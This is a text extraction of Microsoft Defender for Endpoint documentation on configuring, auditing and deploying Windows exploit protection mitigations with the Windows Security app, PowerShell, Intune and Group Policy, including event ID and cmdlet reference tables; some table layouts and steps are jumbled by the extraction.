| extend FileInformationOperation = tostring(parsed.DuplicatedOperation)
| extend FileEvidenceLocation = tostring(parsed.TargetFileLocation)
| project Timestamp, DeviceId, DeviceName, InitiatingProcessAccountName,
ActionType, Policy, PolicyRuleId, FileInformationOperation,
MediaClassName, MediaInstanceId, MediaName, MediaProductId,
MediaVendorId, MediaSerialNumber, FileName, FolderPath, FileSize,
FileEvidenceLocation, AdditionalFields
 Tip
See also
Device control in Microsoft Defender for Endpoint
Feedback

Protect devices from exploits
Article • 07/18/2023
Applies to:

Exploit protection automatically applies many exploit mitigation techniques to operating

system processes and apps. Exploit protection is supported beginning with Windows 10,
version 1709, Windows 11, and Windows Server, version 1803.
Exploit protection works best with Defender for Endpoint - which gives you detailed
reporting into exploit protection events and blocks as part of the usual alert
You can enable exploit protection on an individual device, and then use Group Policy to
distribute the XML file to multiple devices at once.
When a mitigation is found on the device, a notification is displayed from the Action
Center. You can customize the notification with your company details and contact
information. You can also enable the rules individually to customize what techniques the
feature monitors.
You can also use audit mode to evaluate how exploit protection would affect your
Many of the features in the Enhanced Mitigation Experience Toolkit (EMET) are
included in exploit protection. In fact, you can convert and import existing your EMET
configuration profiles into exploit protection. To learn more, see Import, export, and
deploy exploit protection configurations.
） Important
If you are currently using EMET you should be aware that EMET reached end of
support on July 31, 2018 . Consider replacing EMET with exploit protection in
Windows 10.
２ Warning
Some security mitigation technologies may have compatibility issues with some
applications. You should test exploit protection in all target use scenarios by using
audit mode before deploying the configuration across a production environment
or the rest of your network.
Review exploit protection events in the

alert investigation scenarios.
You can query Defender for Endpoint data by using Advanced hunting. If you're using
audit mode, you can use advanced hunting to see how exploit protection settings could
affect your environment.
Here's an example query:
Kusto
DeviceEvents
| where ActionType startswith 'ExploitGuard' and ActionType !contains
'NetworkProtection'
Review exploit protection events in Windows

Event Viewer
You can review the Windows event log to see events that are created when exploit
protection blocks (or audits) an app:
ﾉ Expand table
Provider/source Event ID Description
Security-Mitigations 1 ACG audit
Security-Mitigations 2 ACG enforce
Security-Mitigations 3 Don't allow child processes audit
Security-Mitigations 4 Don't allow child processes block

Provider/source Event ID Description
Security-Mitigations 5 Block low integrity images audit
Security-Mitigations 6 Block low integrity images block
Security-Mitigations 7 Block remote images audit
Security-Mitigations 8 Block remote images block
Security-Mitigations 9 Disable win32k system calls audit
Security-Mitigations 10 Disable win32k system calls block
Security-Mitigations 11 Code integrity guard audit
Security-Mitigations 12 Code integrity guard block
Security-Mitigations 13 EAF audit
Security-Mitigations 14 EAF enforce
Security-Mitigations 15 EAF+ audit
Security-Mitigations 16 EAF+ enforce
Security-Mitigations 17 IAF audit
Security-Mitigations 18 IAF enforce
Security-Mitigations 19 ROP StackPivot audit
Security-Mitigations 20 ROP StackPivot enforce
Security-Mitigations 21 ROP CallerCheck audit
Security-Mitigations 22 ROP CallerCheck enforce
Security-Mitigations 23 ROP SimExec audit
Security-Mitigations 24 ROP SimExec enforce
WER-Diagnostics 5 CFG Block
Win32K 260 Untrusted Font
Mitigation comparison
The mitigations available in EMET are included natively in Windows 10 (starting with
version 1709), Windows 11, and Windows Server (starting with version 1803), under
Exploit protection.
The table in this section indicates the availability and support of native mitigations
between EMET and exploit protection.
ﾉ Expand table
Mitigation Available under exploit protection Available in

EMET
Arbitrary code guard (ACG) Yes Yes

As "Memory
Protection Check"
Block remote images Yes Yes

As "Load Library
Check"
Block untrusted fonts Yes Yes
Data Execution Prevention Yes Yes

(DEP)
Export address filtering (EAF) Yes Yes
Force randomization for Yes Yes

images (Mandatory ASLR)
NullPage Security Mitigation Yes Yes

Included natively in Windows 10 and
Windows 11
For more information, see Mitigate threats
by using Windows 10 security features
Randomize memory Yes Yes

allocations (Bottom-Up
ASLR)
Simulate execution (SimExec) Yes Yes
Validate API invocation Yes Yes

(CallerCheck)
Validate exception chains Yes Yes

(SEHOP)
Validate stack integrity Yes Yes

(StackPivot)
Certificate trust Windows 10 and Windows 11 provide Yes

(configurable certificate enterprise certificate pinning
Mitigation Available under exploit protection Available in
EMET
pinning)
Heap spray allocation Ineffective against newer browser-based Yes

exploits; newer mitigations provide better
protection
For more information, see Mitigate threats
by using Windows 10 security features
Block low integrity images Yes No
Code integrity guard Yes No
Disable extension points Yes No
Disable Win32k system calls Yes No
Don't allow child processes Yes No
Import address filtering (IAF) Yes No
Validate handle usage Yes No
Validate heap integrity Yes No
Validate image dependency Yes No

integrity
７ Note
The Advanced ROP mitigations that are available in EMET are superseded by ACG in
Windows 10 and Windows 11, which other EMET advanced settings are enabled by
default, as part of enabling the anti-ROP mitigations for a process. For more
information on how Windows 10 employs existing EMET technology, see the
Mitigation threats by using Windows 10 security features.
See also
Configure and audit exploit protection mitigations
Troubleshoot exploit protection
 Tip
Feedback

Evaluate exploit protection
Article • 07/18/2023
Applies to:

Exploit protection helps protect devices from malware that uses exploits to spread and
infect other devices. Mitigation can be applied to either the operating system or to an
individual app. Many of the features that were part of the Enhanced Mitigation
Experience Toolkit (EMET) are included in exploit protection. (The EMET has reached its
end of support.)
In audit, you can see how mitigation works for certain apps in a test environment. This
shows what would have happened if you enabled exploit protection in your production
environment. This way, you can verify that exploit protection doesn't adversely affect
your line-of-business apps, and see which suspicious or malicious events occur.
Enable exploit protection for testing

You can set mitigations in a testing mode for specific programs by using the Windows
Security app or Windows PowerShell.

1. Open the Windows Security app. Select the shield icon in the task bar or search the
start menu for Windows Security.
2. Select the App & browser control tile (or the app icon on the left menu bar) and
then select Exploit protection.
3. Go to Program settings and choose the app you want to apply protection to:
a. If the app you want to configure is already listed, select it and then select Edit
b. If the app isn't listed at the top of the list select Add program to customize.
Then, choose how you want to add the app.
Use Add by program name to have the mitigation applied to any running
process with that name. Specify a file with an extension. You can enter a
full path to limit the mitigation to only the app with that name in that
location.
Use Choose exact file path to use a standard Windows Explorer file picker
window to find and select the file you want.
4. After selecting the app, you'll see a list of all the mitigations that can be applied.
Choosing Audit will apply the mitigation in test mode only. You'll be notified if you
need to restart the process, app, or Windows.
5. Repeat this procedure for all the apps and mitigations you want to configure.
Select Apply when you're done setting up your configuration.
PowerShell
To set app-level mitigations to test mode, use Set-ProcessMitigation with the Audit
mode cmdlet.
Configure each mitigation in the following format:
PowerShell
Set-ProcessMitigation -<scope> <app executable> -<action> <mitigation or

options>,<mitigation or options>,<mitigation or options>
Where:
<Scope>:
-Name to indicate the mitigations should be applied to a specific app. Specify
the app's executable after this flag.

<Action>:
-Enable to enable the mitigation
-Disable to disable the mitigation
<Mitigation>:
The mitigation's cmdlet as defined in the following table. Each mitigation is
separated with a comma.
ﾉ Expand table
Mitigation Test mode cmdlet
Arbitrary Code Guard (ACG) AuditDynamicCode

Mitigation Test mode cmdlet
Block low integrity images AuditImageLoad
Block untrusted fonts AuditFont , FontAuditOnly
Code integrity guard AuditMicrosoftSigned , AuditStoreSigned
Disable Win32k system calls AuditSystemCall
Don't allow child processes AuditChildProcess
For example, to enable Arbitrary Code Guard (ACG) in test mode for an app named
testing.exe, run the following command:
PowerShell
Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable

AuditDynamicCode
You can disable audit mode by replacing -Enable with -Disable .
Review exploit protection audit events

To review which apps would have been blocked, open Event Viewer and filter for the
following events in the Security-Mitigations log.
ﾉ Expand table

ID
Exploit Security-Mitigations (Kernel 1 ACG audit

Exploit Security-Mitigations (Kernel 3 Do not allow child

protection Mode/User Mode) processes audit
Exploit Security-Mitigations (Kernel 5 Block low integrity images

protection Mode/User Mode) audit
Exploit Security-Mitigations (Kernel 7 Block remote images audit

Exploit Security-Mitigations (Kernel 9 Disable win32k system calls

protection Mode/User Mode) audit
ID
Exploit Security-Mitigations (Kernel 11 Code integrity guard audit

See also
Enable exploit protection
Import, export, and deploy exploit protection configurations
 Tip
Feedback

Article • 05/03/2023
Applies to:

 Tip
Exploit protection helps protect against malware that uses exploits to infect devices and
spread. Exploit protection consists of many mitigations that can be applied to either the
operating system or individual apps.
） Important
.NET 2.0 is not compatible with some exploit protection capabilities, specifically,
Export Address Filtering (EAF) and Import Address Filtering (IAF). If you have
enabled .NET 2.0, usage of EAF and IAF are not supported.
Many features from the Enhanced Mitigation Experience Toolkit (EMET) are included in
exploit protection.
You can enable each mitigation separately by using any of these methods:

Microsoft Intune
Group Policy
PowerShell
Exploit protection is configured by default in Windows 10 and Windows 11. You can set
each mitigation to on, off, or to its default value. Some mitigations have more options.
You can export these settings as an XML file and deploy them to other devices.
You can also set mitigations to audit mode. Audit mode allows you to test how the
mitigations would work (and review events) without impacting the normal use of the
device.

1. Open the Windows Security app by either selecting the shield icon in your task bar,
or by searching the Start menu for Security.
then select Exploit protection settings.
3. Go to Program settings and choose the app you want to apply mitigations to.
If the app you want to configure is already listed, select it, and then select
Edit.
If the app isn't listed, at the top of the list select Add program to customize
and then choose how you want to add the app.
process with that name. Specify a file with its extension. You can enter a full
path to limit the mitigation to only the app with that name in that location.
Choosing Audit will apply the mitigation in audit mode only. You're notified if you
need to restart the process or app, or if you need to restart Windows.
5. Repeat steps 3-4 for all the apps and mitigations you want to configure.
6. Under the System settings section, find the mitigation you want to configure and
then specify one of the following settings. Apps that aren't configured individually
in the Program settings section use the settings that are configured here.
On by default: The mitigation is enabled for apps that don't have this
mitigation set in the app-specific Program settings section
Off by default: The mitigation is disabled for apps that don't have this
Use default: The mitigation is either enabled or disabled, depending on the
default configuration that is set up by Windows 10 or Windows 11
installation; the default value (On or Off) is always specified next to the Use
default label for each mitigation
7. Repeat step 6 for all the system-level mitigations you want to configure. Select
Apply when you're done setting up your configuration.
If you add an app to the Program settings section and configure individual mitigation
settings there, they'll be honored above the configuration for the same mitigations
specified in the System settings section. The following matrix and examples help to
illustrate how defaults work:
ﾉ Expand table
Enabled in Program Enabled in System Behavior

settings settings
Yes No As defined in Program settings
Yes Yes As defined in Program settings
No Yes As defined in System settings
No No Default as defined in Use default

option
Example 1: Mikael configures Data Execution Prevention

in system settings section to be off by default
Mikael adds the app test.exe to the Program settings section. In the options for that
app, under Data Execution Prevention (DEP), Mikael enables the Override system
settings option and sets the switch to On. There are no other apps listed in the Program
settings section.
The result is that DEP is enabled only for test.exe. All other apps won't have DEP applied.
Example 2: Josie configures Data Execution Prevention in

system settings to be off by default
Josie adds the app test.exe to the Program settings section. In the options for that app,
under Data Execution Prevention (DEP), Josie enables the Override system settings
option and sets the switch to On.
Josie also adds the app miles.exe to the Program settings section and configures
Control flow guard (CFG) to On. Josie doesn't enable the Override system settings
option for DEP or any other mitigations for that app.
The result is that DEP is enabled for test.exe. DEP won't be enabled for any other app,
including miles.exe. CFG will be enabled for miles.exe.
1. Open the Windows Security app by selecting the shield icon in the task bar or
searching the start menu for Windows Security.
3. Go to Program settings and choose the app you want to apply mitigations to.
If the app you want to configure is already listed, select it, and then select
Edit.
If the app isn't listed, at the top of the list select Add program to customize
and then choose how you want to add the app.
process with that name. Specify a file with an extension. You can enter a
full path to limit the mitigation to only the app with that name in that
location.
Choosing Audit will apply the mitigation in audit mode only. You'll be notified if
you need to restart the process or app, or if you need to restart Windows.
5. Repeat steps 3-4 for all the apps and mitigations you want to configure. Select
Intune
1. Sign in to the Azure portal and open Intune.
2. Go to Device configuration > Configuration Profiles > Create profile.
3. Name the profile, choose Windows 10 and later, select templates for Profile type
and choose Endpoint protection under template name.

4. Select Configure > Windows Defender Exploit Guard > Exploit protection.
5. Upload an XML file with the exploit protection settings:
6. Select OK to save each open blade, and then choose Create.

7. Select the profile Assignments tab, assign the policy to All Users & All Devices,
and then select Save.
MDM
Use the ./Vendor/MSFT/Policy/Config/ExploitGuard/ExploitProtectionSettings
configuration service provider (CSP) to enable or disable exploit protection mitigations
or to use audit mode.
Endpoint Security
1. In Microsoft Configuration Manager, go to Endpoint Security > Attack surface
reduction.
2. Select Create Policy > Platform, and for Profile, choose Exploit Protection. Then
select Create.
3. Specify a name and a description, and then choose Next.
4. Choose Select XML File and browse to the location of the exploit protection XML
file. Select the file, and then choose Next.
5. Configure Scope tags and Assignments if necessary.
6. Under Review + create, review your configuration settings, and then choose
Create.
Assets and Compliance

3. Specify a name and a description, select Exploit protection, and then choose Next.
4. Browse to the location of the exploit protection XML file and select Next.
5. Review the settings, and then choose Next to create the policy.
6. After the policy is created, select Close.

Group Policy
Console, right-click the Group Policy Object you want to configure and click Edit.

3. Expand the tree to Windows components > Windows Defender Exploit Guard >
Exploit Protection > Use a common set of exploit protection settings.
4. Select Enabled and type the location of the XML file, and then choose OK.
PowerShell
You can use the PowerShell verb Get or Set with the cmdlet ProcessMitigation . Using
Get will list the current configuration status of any mitigations that have been enabled
on the device - add the -Name cmdlet and app exe to see mitigations for just that app:
PowerShell
Get-ProcessMitigation -Name processName.exe
） Important
System-level mitigations that have not been configured will show a status of
NOTSET .
For system-level settings, NOTSET indicates the default setting for that
mitigation has been applied.
For app-level settings, NOTSET indicates the system-level setting for the
mitigation will be applied. The default setting for each system-level mitigation
can be seen in the Windows Security.
Use Set to configure each mitigation in the following format:
PowerShell

Where:
<Scope>:

-System to indicate the mitigation should be applied at the system level
<Action>:
<Mitigation>:
The mitigation's cmdlet along with any suboptions (surrounded with spaces).
Each mitigation is separated with a comma.
For example, to enable the Data Execution Prevention (DEP) mitigation with ATL thunk
emulation and for an executable called testing.exe in the folder C:\Apps\LOB\tests, and to
prevent that executable from creating child processes, you'd use the following
command:
PowerShell
Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable DEP,

EmulateAtlThunks, DisallowChildProcessCreation
） Important
Separate each mitigation option with commas.
If you wanted to apply DEP at the system level, you'd use the following command:
PowerShell
Set-Processmitigation -System -Enable DEP
To disable mitigations, you can replace -Enable with -Disable . However, for app-level
mitigations, this action forces the mitigation to be disabled only for that app.
If you need to restore the mitigation back to the system default, you need to include the
-Remove cmdlet as well, as in the following example:
PowerShell
Set-Processmitigation -Name test.exe -Remove -Disable DEP

The following table lists the individual Mitigations (and Audits, when available) to be
used with the -Enable or -Disable cmdlet parameters.
ﾉ Expand table
Mitigation type Applies Mitigation cmdlet parameter Audit mode cmdlet

to keyword parameter
Control flow guard System CFG , StrictCFG , SuppressExports Audit not available
(CFG) and app-
level
Data Execution System DEP , EmulateAtlThunks Audit not available

Prevention (DEP) and app-
level
Force System ForceRelocateImages Audit not available

randomization for and app-
images (Mandatory level
ASLR)
Randomize System BottomUp , HighEntropy Audit not available

memory and app-
allocations level
(Bottom-Up ASLR)
Validate exception System SEHOP , SEHOPTelemetry Audit not available

chains (SEHOP) and app-
level
Validate heap System TerminateOnError Audit not available

integrity and app-
level
Arbitrary code App-level DynamicCode AuditDynamicCode

guard (ACG) only
Block low integrity App-level BlockLowLabel AuditImageLoad

images only
Block remote App-level BlockRemoteImages Audit not available

images only
Block untrusted App-level DisableNonSystemFonts AuditFont ,

fonts only FontAuditOnly
Code integrity App-level BlockNonMicrosoftSigned , AuditMicrosoftSigned,

guard only AllowStoreSigned AuditStoreSigned
Mitigation type Applies Mitigation cmdlet parameter Audit mode cmdlet
to keyword parameter
Disable extension App-level ExtensionPoint Audit not available

points only
Disable Win32k App-level DisableWin32kSystemCalls AuditSystemCall

system calls only
Don't allow child App-level DisallowChildProcessCreation AuditChildProcess

processes only
Export address App-level EnableExportAddressFilterPlus , Audit not available [2]

filtering (EAF) only EnableExportAddressFilter [1]
Import address App-level EnableImportAddressFilter Audit not available [2]

filtering (IAF) only
Simulate execution App-level EnableRopSimExec Audit not available [2]

(SimExec) only
Validate API App-level EnableRopCallerCheck Audit not available [2]

invocation only
(CallerCheck)
Validate handle App-level StrictHandle Audit not available

usage only
Validate image App-level EnforceModuleDepencySigning Audit not available

dependency only
integrity
Validate stack App-level EnableRopStackPivot Audit not available [2]

integrity only
(StackPivot)
[1]: Use the following format to enable EAF modules for DLLs for a process:
PowerShell
Set-ProcessMitigation -Name processName.exe -Enable

EnableExportAddressFilterPlus -EAFModules dllName1.dll,dllName2.dll
[2]: Audit for this mitigation isn't available via PowerShell cmdlets.

For information about customizing the notification when a rule is triggered and an app
or file is blocked, see Windows Security.
See also
 Tip
Feedback

Customize exploit protection
Article • 09/29/2022
Applies to:

Exploit protection automatically applies a number of exploit mitigation techniques on

both the operating system processes and on individual apps.
Configure these settings using the Windows Security app on an individual device. Then,
export the configuration as an XML file so you can deploy to other devices. Use Group
Policy to distribute the XML file to multiple devices at once. You can also configure the
mitigations with PowerShell.
This article lists each of the mitigations available in exploit protection. It indicates
whether the mitigation can be applied system-wide or to individual apps, and provides a
brief description of how the mitigation works.
It also describes how to enable or configure the mitigations using Windows Security,
PowerShell, and mobile device management (MDM) configuration service providers
(CSPs). This is the first step in creating a configuration that you can deploy across your
network. The next step involves generating, exporting, importing, and deploying the
configuration to multiple devices.
２ Warning
Some security mitigation technologies may have compatibility issues with some
applications. You should test exploit protection in all target use scenarios by using
audit mode before deploying the configuration across a production environment
or the rest of your network.
Exploit protection mitigations

All mitigations can be configured for individual apps. Some mitigations can also be
applied at the operating system level.
You can set each of the mitigations on, off, or to their default value. Some mitigations
have additional options that are indicated in the description in the table.
Default values are always specified in brackets at the Use default option for each
mitigation. In the following example, the default for Data Execution Prevention is "On".
The Use default configuration for each of the mitigation settings indicates our
recommendation for a base level of protection for everyday usage for home users.
Enterprise deployments should consider the protection required for their individual
needs and may need to modify configuration away from the defaults.
For the associated PowerShell cmdlets for each mitigation, see the PowerShell reference
table at the bottom of this article.
ﾉ Expand table
Mitigation Description Can be Audit

applied mode
to available
Control flow guard Ensures control flow integrity for indirect calls. System No
(CFG) Can optionally suppress exports and use strict and app-
CFG. level
Data Execution Prevents code from being run from data-only System No
Prevention (DEP) memory pages such as the heap and stacks. and app-
Only configurable for 32-bit (x86) apps, level
permanently enabled for all other architectures.
Can optionally enable ATL thunk emulation.
Force Forcibly relocates images not compiled with System No

randomization for /DYNAMICBASE. Can optionally fail loading and app-
images (Mandatory images that don't have relocation information. level
ASLR)
Randomize memory Randomizes locations for virtual memory System No

allocations allocations. It includes system structure heaps, and app-
(Bottom-Up ASLR) stacks, TEBs, and PEBs. Can optionally use a level
wider randomization variance for 64-bit
processes.
Validate exception Ensures the integrity of an exception chain System No

chains (SEHOP) during exception dispatch. Only configurable for and app-
32-bit (x86) applications. level
Validate heap Terminates a process when heap corruption is System No

integrity detected. and app-
level
applied mode
to available
Arbitrary code Prevents the introduction of non-image-backed App-level Yes

guard (ACG) executable code and prevents code pages from only
being modified. Can optionally allow thread
opt-out and allow remote downgrade
(configurable only with PowerShell).
Block low integrity Prevents the loading of images marked with Low App-level Yes
images Integrity. only
Block remote Prevents loading of images from remote App-level No

images devices. only
Block untrusted Prevents loading any GDI-based fonts not App-level Yes
fonts installed in the system fonts directory, notably only
fonts from the web.
Code integrity Restricts loading of images signed by Microsoft, App-level Yes

guard WHQL, or higher. Can optionally allow Microsoft only
Store signed images.
Disable extension Disables various extensibility mechanisms that App-level No

points allow DLL injection into all processes, such as only
AppInit DLLs, window hooks, and Winsock
service providers.
Disable Win32k Prevents an app from using the Win32k system App-level Yes
system calls call table. only
Don't allow child Prevents an app from creating child processes. App-level Yes
processes only
Export address Detects dangerous operations being resolved by App-level Yes

filtering (EAF) malicious code. Can optionally validate access only
by modules commonly used by exploits.
Import address Detects dangerous operations being resolved by App-level Yes

filtering (IAF) malicious code. only
Simulate execution Ensures that calls to sensitive APIs return to App-level Yes
(SimExec) legitimate callers. Only configurable for 32-bit only
(x86) applications. Not compatible with ACG.
Validate API Ensures that sensitive APIs are invoked by App-level Yes
invocation legitimate callers. Only configurable for 32-bit only
(CallerCheck) (x86) applications. Not compatible with ACG
Validate handle Causes an exception to be raised on any invalid App-level No

applied mode
to available
usage handle references. only
Validate image Enforces code signing for Windows image App-level No

dependency dependency loading. only
integrity
Validate stack Ensures that the stack hasn't been redirected for App-level Yes
integrity sensitive APIs. Not compatible with ACG. only
(StackPivot)
） Important
If you add an app to the Program settings section and configure individual
mitigation settings there, they will be honored above the configuration for the
same mitigations specified in the System settings section. The following matrix and
examples help to illustrate how defaults work:
ﾉ Expand table
Enabled in Program Enabled in System Behavior

settings settings
Yes No As defined in Program settings
Yes Yes As defined in Program settings
No Yes As defined in System settings
No No Default as defined in Use default

option
Example 1 Mikael configures Data Execution Prevention (DEP) in the System

settings section to be Off by default. Mikael then adds the app test.exe to the
Program settings section. In the options for that app, under Data Execution
Prevention (DEP), he enables the Override system settings option and sets
the switch to On. There are no other apps listed in the Program settings
section. The result will be that DEP only will be enabled for test.exe. All other
apps will not have DEP applied.
Example 2 Josie configures Data Execution Prevention (DEP) in the System

settings section to be Off by default. Josie then adds the app test.exe to the
Program settings section. In the options for that app, under Data Execution
Prevention (DEP), she enables the Override system settings option and sets
the switch to On. Josie also adds the app miles.exe to the Program settings
section and configures Control flow guard (CFG) to On. She doesn't enable
the Override system settings option for DEP or any other mitigations for that
app. The result will be that DEP will be enabled for test.exe. DEP will not be
enabled for any other app, including miles.exe. CFG will be enabled for
miles.exe.
７ Note
If you have found any issues in this article, you can report it directly to a Windows
Server/Windows Client partner or use the Microsoft technical support numbers for
your country/region.
Configure system-level mitigations with the Windows

Security app
1. Open the Windows Security app by selecting the shield icon in the task bar or
3. Under the System settings section, find the mitigation you want to configure and
select one of the following. Apps that aren't configured individually in the Program
settings section will use the settings configured here:
On by default - The mitigation is enabled for apps that don't have this
Off by default - The mitigation is disabled for apps that don't have this
Use default - The mitigation is either enabled or disabled, depending on the
default configuration that is set up by Windows 10 or Windows 11
installation; the default value (On or Off) is always specified next to the Use
default label for each mitigation
７ Note
You may see a User Account Control window when changing some settings.
Enter administrator credentials to apply the setting.
Changing some settings may require a restart.
4. Repeat this for all the system-level mitigations you want to configure.
5. Go to the Program settings section and choose the app you want to apply
mitigations to:
a. If the app you want to configure is already listed, select it and then select Edit
b. If the app isn't listed, at the top of the list select Add program to customize and
then choose how you want to add the app:
process with that name. You must specify a file with an extension. You can
enter a full path to limit the mitigation to only the app with that name in
that location.
6. After selecting the app, you'll see a list of all the mitigations that can be applied. To
enable the mitigation, select the check box and then change the slider to On.
Select any additional options. Choosing Audit will apply the mitigation in audit
mode only. You will be notified if you need to restart the process or app, or if you
need to restart Windows.
7. Repeat these steps for all the apps and mitigations you want to configure. Select
You can now export these settings as an XML file or continue on to configure app-
specific mitigations.
Exporting the configuration as an XML file allows you to copy the configuration from
one device onto other devices.
PowerShell reference
You can use the Windows Security app to configure Exploit protection, or you can use
PowerShell cmdlets.
The configuration settings that were most recently modified will always be applied -
regardless of whether you use PowerShell or Windows Security. This means that if you
use the app to configure a mitigation, then use PowerShell to configure the same
mitigation, the app will update to show the changes you made with PowerShell. If you
were to then use the app to change the mitigation again, that change would apply.
） Important
Any changes that are deployed to a device through Group Policy will override the
local configuration. When setting up an initial configuration, use a device that will
not have a Group Policy configuration applied to ensure your changes aren't
overridden.
You can use the PowerShell verb Get or Set with the cmdlet ProcessMitigation . Using
Get will list the current configuration status of any mitigations that have been enabled
on the device - add the -Name cmdlet and app exe to see mitigations for just that app:
PowerShell
Get-ProcessMitigation -Name processName.exe
） Important
System-level mitigations that have not been configured will show a status of
NOTSET .
For system-level settings, NOTSET indicates the default setting for that mitigation
has been applied.
For app-level settings, NOTSET indicates the system-level setting for the mitigation
will be applied.
The default setting for each system-level mitigation can be seen in the Windows
Security.
Use Set to configure each mitigation in the following format:
PowerShell

Where:
<Scope>:

-System to indicate the mitigation should be applied at the system level
<Action>:
<Mitigation>:
The mitigation's cmdlet as defined in the mitigation cmdlets table below, along
with any suboptions (surrounded with spaces). Each mitigation is separated with
a comma.
For example, to enable the Data Execution Prevention (DEP) mitigation with ATL thunk
emulation and for an executable called testing.exe in the folder C:\Apps\LOB\tests, and to
prevent that executable from creating child processes, you'd use the following
command:
PowerShell
Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable DEP,

EmulateAtlThunks, DisallowChildProcessCreation
） Important
Separate each mitigation option with commas.
If you wanted to apply DEP at the system level, you'd use the following command:
PowerShell
Set-Processmitigation -System -Enable DEP
To disable mitigations, you can replace -Enable with -Disable . However, for app-level
mitigations, this will force the mitigation to be disabled only for that app.
If you need to restore the mitigation back to the system default, you need to include the
-Remove cmdlet as well, as in the following example:
PowerShell
Set-Processmitigation -Name test.exe -Remove -Disable DEP

You can also set some mitigations to audit mode. Instead of using the PowerShell
cmdlet for the mitigation, use the Audit mode cmdlet as specified in the mitigation
cmdlets table below.
For example, to enable Arbitrary Code Guard (ACG) in audit mode for the testing.exe
used previously, you'd use the following command:
PowerShell
Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable

AuditDynamicCode
You can disable audit mode by using the same command but replacing -Enable with -
Disable .
PowerShell reference table

This table lists the PowerShell cmdlets (and associated audit mode cmdlet) that can be
used to configure each mitigation.
ﾉ Expand table
Mitigation Applies PowerShell cmdlets Audit mode cmdlet

to
Control flow guard System CFG, StrictCFG, SuppressExports Audit not available
(CFG) and app-
level
Data Execution System DEP, EmulateAtlThunks Audit not available

Prevention (DEP) and app-
level
Force System ForceRelocateImages Audit not available

randomization for and app-
images (Mandatory level
ASLR)
Randomize System BottomUp, HighEntropy Audit not available

memory allocations and app-
(Bottom-Up ASLR) level
Validate exception System SEHOP, SEHOPTelemetry Audit not available

chains (SEHOP) and app-
level
to
Validate heap System TerminateOnError Audit not available

integrity and app-
level
Arbitrary code App-level DynamicCode AuditDynamicCode

guard (ACG) only
Block low integrity App-level BlockLowLabel AuditImageLoad

images only
Block remote App-level BlockRemoteImages Audit not available

images only
Block untrusted App-level DisableNonSystemFonts AuditFont,

fonts only FontAuditOnly
Code integrity App-level BlockNonMicrosoftSigned, AuditMicrosoftSigned,

guard only AllowStoreSigned AuditStoreSigned
Disable extension App-level ExtensionPoint Audit not available

points only
Disable Win32k App-level DisableWin32kSystemCalls AuditSystemCall

system calls only
Do not allow child App-level DisallowChildProcessCreation AuditChildProcess

processes only
Export address App-level EnableExportAddressFilterPlus, Audit not available[2]

filtering (EAF) only EnableExportAddressFilter [1]
Import address App-level EnableImportAddressFilter Audit not available[2]

filtering (IAF) only
Simulate execution App-level EnableRopSimExec Audit not available[2]

(SimExec) only
Validate API App-level EnableRopCallerCheck Audit not available[2]

invocation only
(CallerCheck)
Validate handle App-level StrictHandle Audit not available

usage only
Validate image App-level EnforceModuleDepencySigning Audit not available

dependency only
integrity
to
Validate stack App-level EnableRopStackPivot Audit not available[2]

integrity only
(StackPivot)
[1]: Use the following format to enable EAF modules for dlls for a process:
PowerShell
Set-ProcessMitigation -Name processName.exe -Enable

EnableExportAddressFilterPlus -EAFModules dllName1.dll,dllName2.dll
[2]: Audit for this mitigation is not available via PowerShell cmdlets.

For more information about customizing the notification when a rule is triggered and
blocks an app or file, see Windows Security.
See also
 Tip
Feedback

Import, export, and deploy exploit
protection configurations
Article • 06/29/2023
Applies to:

Exploit protection helps protect devices from malware that use exploits to spread and
infect. It consists of a number of mitigations that can be applied at either the operating
system level, or at the individual app level.
You use the Windows Security app or PowerShell to create a set of mitigations (known
as a configuration). You can then export this configuration as an XML file and share it
with multiple devices on your network. Then, they all have the same set of mitigation
settings.
Create and export a configuration file

Before you export a configuration file, you need to ensure you have the correct settings.
First, configure exploit protection on a single, dedicated device. See Customize exploit
protection for more information about configuring mitigations.
When you've configured exploit protection to your desired state (including both system-
level and app-level mitigations), you can export the file using either the Windows
Security app or PowerShell.
Use the Windows Security app to export a configuration

file
1. Open the Windows Security app by selecting the shield icon in the task bar. Or,
search the start menu for Windows Security.
then select Exploit protection settings:

3. At the bottom of the Exploit protection section, select Export settings. Choose the
location and name of the XML file where you want the configuration to be saved.
） Important
If you want to use Default configuration, use the settings "On by default"
instead of "Use Default (On)" to get the settings exported correctly on the
XML file.
７ Note
When you export the settings, all settings for both app-level and system-level
mitigations are saved. This means you don't need to export a file from both
the System settings and Program settings sections (either section will export
all settings).
Use PowerShell to export a configuration file

as administrator.
PowerShell
Get-ProcessMitigation -RegistryConfigFilePath filename.xml
Change filename to any name or location of your choosing.
Example command:
PowerShell
Get-ProcessMitigation -RegistryConfigFilePath C:\ExploitConfigfile.xml
） Important
When you deploy the configuration using Group Policy, all devices that will use the
configuration must be able to access the configuration file. Ensure you place the
file in a shared location.
Import a configuration file

You can import an exploit protection configuration file that you've previously created.
You can only use PowerShell to import the configuration file.
After importing, the settings will be instantly applied and can be reviewed in the
Use PowerShell to import a configuration file

as administrator.
PowerShell
Set-ProcessMitigation -PolicyFilePath filename.xml
Change filename to the location and name of the exploit protection XML file.
Example command:
PowerShell
Set-ProcessMitigation -PolicyFilePath C:\ExploitConfigfile.xml
） Important
Ensure you import a configuration file that is created specifically for exploit
protection.
Manage or deploy a configuration

You can use Group Policy to deploy the configuration you've created to multiple devices
in your network.
） Important
When you deploy the configuration using Group Policy, all devices that will use the
configuration must be able to access the configuration XML file. Ensure you place
the file in a shared location.
Use Group Policy to distribute the configuration

Console, right-click the Group Policy Object you want to configure and Edit.

3. Expand the tree to Windows components > Microsoft Defender Exploit Guard >
Exploit protection.

4. Double-click Use a common set of Exploit protection settings and set the option
to Enabled.
5. In the Options: section, enter the location and file name of the Exploit protection
configuration file that you want to use, such as in the following examples:
C:\MitigationSettings\Config.XML
\\Server\Share\Config.xml
https://localhost:8080/Config.xml
C:\ExploitConfigfile.xml
6. Select OK and Deploy the updated GPO as you normally do.
See also
 Tip
Feedback

mitigations
Article • 07/18/2023
Applies to:

When you create a set of exploit protection mitigations (known as a configuration), you
might find that the configuration export and import process does not remove all
unwanted mitigations.
You can manually remove unwanted mitigations in Windows Security, or you can use the
following process to remove all mitigations and then import a baseline configuration file
instead.
1. Remove all process mitigations with this PowerShell script:
PowerShell
# Check if Admin-Privileges are available

function Test-IsAdmin {
